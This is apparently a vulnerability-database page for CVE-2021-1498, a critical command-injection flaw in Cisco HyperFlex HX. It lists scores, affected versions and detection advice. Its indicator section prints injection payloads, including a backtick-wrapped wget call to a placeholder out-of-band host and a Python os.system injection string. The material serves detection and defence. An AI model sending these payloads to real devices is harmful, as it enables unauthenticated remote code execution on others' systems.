cbcvebase.
CVE-2021-1498
published 2021-05-06

CVE-2021-1498: Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command…

PriorityP198critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2021-11-17
Exploited in the wild
EPSS
100.00%
100.0th percentile
Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory.

Affected

4 ranges
VendorProductVersion rangeFixed in
ciscocisco_hyperflex_hx_data_platform
ciscohyperflex_hx
ciscohyperflex_hx_data_platform< 4.0\(2e\)4.0\(2e\)
ciscohyperflex_hx_data_platform>= 4.5 < 4.5\(2a\)4.5\(2a\)

Detection & IOCsextracted from sources · hover to see the quote

url/storfs-asup
url/auth/change
url/auth
commandaction=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}`
commandusername=root&password={{url_encode(payload)}}
other123",""$6$$)); import os;os.system("{{cmd}}");print(crypt.crypt("
  • Monitor for POST requests to /storfs-asup with parameters 'action', 'token', and 'mode' containing backtick-wrapped shell commands (command substitution syntax), indicating command injection attempts.
  • Monitor for POST requests to /auth/change or /auth with a 'username=root' and a password field containing Python os.system injection payloads (e.g., 'import os;os.system(...)' or crypt.crypt injection patterns).
  • The vulnerability allows command execution as the 'tomcat8' user (or Tomcat user); look for unexpected child processes spawned by tomcat8 on Cisco HyperFlex HX Installer Virtual Machine.
  • The /storfs-asup endpoint is the primary attack surface exploited by the Metasploit module for unauthenticated command injection; alert on any unauthenticated POST to this path.
  • ·No workarounds are available for these vulnerabilities; only vendor-supplied software updates remediate the issue.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_cisco9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.